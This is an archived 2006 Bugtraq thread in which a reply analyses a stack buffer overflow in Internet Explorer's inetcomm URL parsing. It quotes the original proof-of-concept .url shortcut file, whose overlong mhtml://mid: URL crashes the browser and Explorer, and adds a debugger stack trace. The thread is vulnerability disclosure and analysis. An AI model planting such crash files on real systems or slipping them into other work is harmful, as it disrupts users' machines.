Bugtraq mailing list archives

Re: Internet explorer Vulnerbility

From: "Hariharan" <harij22 () gmail com>
Date: Thu, 1 Jun 2006 12:31:02 +0530

I see this work in explorer and my ie 7 beta, both of them crashes. Butthis does not seem to be easily exploitable. It is a simple stack bufferoverun issue. The problem seems to be ininetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seemed to have beengs flagged complied,hence the ovewrite of the security cookie casuses theinternal handler inetcomm!__report_gsfailure to be called on fucntionreturn. This could be exploitable if we some evasive techniques is used. Buton the face of it does not seem like a easy nut to crack.

All applications which use inetcomm are vulnerable if they are using urlparsing, specially mhtml:cid or mid, havent tried others yet, maybepossible.



Thanks
-Hariharan

PS: This is what the stack looks like, notice the 'a' in it, seemsinternally the fucntion converts the url case.



00df9318 7c802542 00000758 000493e0 00000000 ntdll!KiFastSystemCallRet

00df932c 6945ada6 00000758 000493e0 003a0043kernel32!WaitForSingleObject+0x12

00df9e10 6945aff1 00000734 00000b90 00000748faultrep!InternalGenerateMinidumpEx+0x335

00df9e3c 6945b50a 00000734 00000b90 00dfa7e0faultrep!InternalGenerateMinidump+0x75

00dfa718 69456652 00000734 00000b90 00dfa7e0faultrep!InternalGenFullAndTriageMinidumps+0x8a


00dfbfd8 69457d3d 00dfc040 0154f660 00000000 faultrep!ReportFaultDWM+0x4e5

00dfc4c0 694582d8 00dfdad8 00dfd308 00000001faultrep!StartManifestReportImmediate+0x268


00dfd52c 7c863059 00dfdad8 00000001 00dfd800 faultrep!ReportFault+0x55a

00dfd7a0 761e234e 00dfdad8 00000000 c0000409kernel32!UnhandledExceptionFilter+0x4cf

00dfdae0 761769f2 00000000 00000000 00000000inetcomm!__report_gsfailure+0xe3

00dfe444 61616161 61616161 61616161 61616161inetcomm!CActiveUrlRequest::ParseUrl+0x67e


00dfe468 61616161 61616161 61616161 61616161 0x61616161

00dfe46c 61616161 61616161 61616161 61616161 0x61616161

00dfe470 61616161 61616161 61616161 61616161 0x61616161

00dfe474 61616161 61616161 61616161 61616161 0x61616161

00dfe478 61616161 61616161 61616161 61616161 0x61616161

00dfe47c 61616161 61616161 61616161 61616161 0x61616161

00dfe480 61616161 61616161 61616161 61616161 0x61616161

00dfe484 61616161 61616161 61616161 61616161 0x61616161

00dfe488 61616161 61616161 61616161 61616161 0x61616161

----- Original Message -----From: <Mr.Niega () gmail com>

To: <bugtraq () securityfocus com>
Sent: Thursday, June 01, 2006 1:42 AM
Subject: Internet explorer Vulnerbility

------------------------------Niega.url-------------------------------

[DEFAULT]

BASEURL=

[InternetShortcut]

URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

/*

*

* Internet Explorer overflow Vulnerbility [Proof of concept]

* Bug discovered by Mr.Niega

* http://www.swerat.com/

*

* Affected Software: Microsoft Internet Explorer 6.x

* Severity: Unknown

* Impact: Crash

* Solution Status: Unpatched

*

* E-Mail: Mr.Niega () gmail com

* Credits goes out to MarjinZ and Andvare

*

* Note: By right clicking on the file explorer will crash

* Note: del=crash,F2=crash Use cmd to delete file

*/

------------------------------Niega.url-------------------------------

Current thread:

Re: Internet explorer Vulnerbility Alexander Sotirov (Jun 01)
- <Possible follow-ups>
- RE: Internet explorer Vulnerbility Peter Kruse (Jun 01)
- Re: Internet explorer Vulnerbility Hariharan (Jun 04)
- Internet Explorer vulnerbility Mr . Niega (Jun 08)
  - Re: Internet Explorer vulnerbility Andrei Ponomarev (Jun 12)
  - Re: Internet Explorer vulnerbility Michael N. Telnov (Jun 12)
- RE: Internet Explorer vulnerbility Greg Merideth (Forward Technology) (Jun 12)
  - Re: RE: Internet Explorer vulnerbility Charles Hamby (Jun 17)